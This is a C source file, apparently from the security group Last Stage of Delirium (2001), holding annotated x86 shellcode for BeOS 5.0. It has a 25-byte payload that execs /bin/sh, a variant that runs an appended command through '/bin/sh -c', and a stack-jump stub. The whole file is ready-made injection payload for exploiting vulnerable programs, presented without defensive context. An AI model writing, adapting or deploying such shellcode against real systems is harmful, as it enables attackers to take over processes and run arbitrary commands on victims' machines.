/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for beos 5.0 x86                                               #*/

/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
execv       x03f ret,anum=1,->[->path="/bin//sh"],0
execv       x03f ret,anum=3,->[->path="/bin//sh",->a1="-c",->a2=cmd],0
*/

#if defined(X86) && defined(BEOS)

char shellcode[]=          /* 25 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x54"                 /* pushl   %esp                   */ 
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */ 
;

char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x03"             /* pushb   $0x03                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */ 
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax            */
    "\xc3"                 /* ret                          */
;

#endif
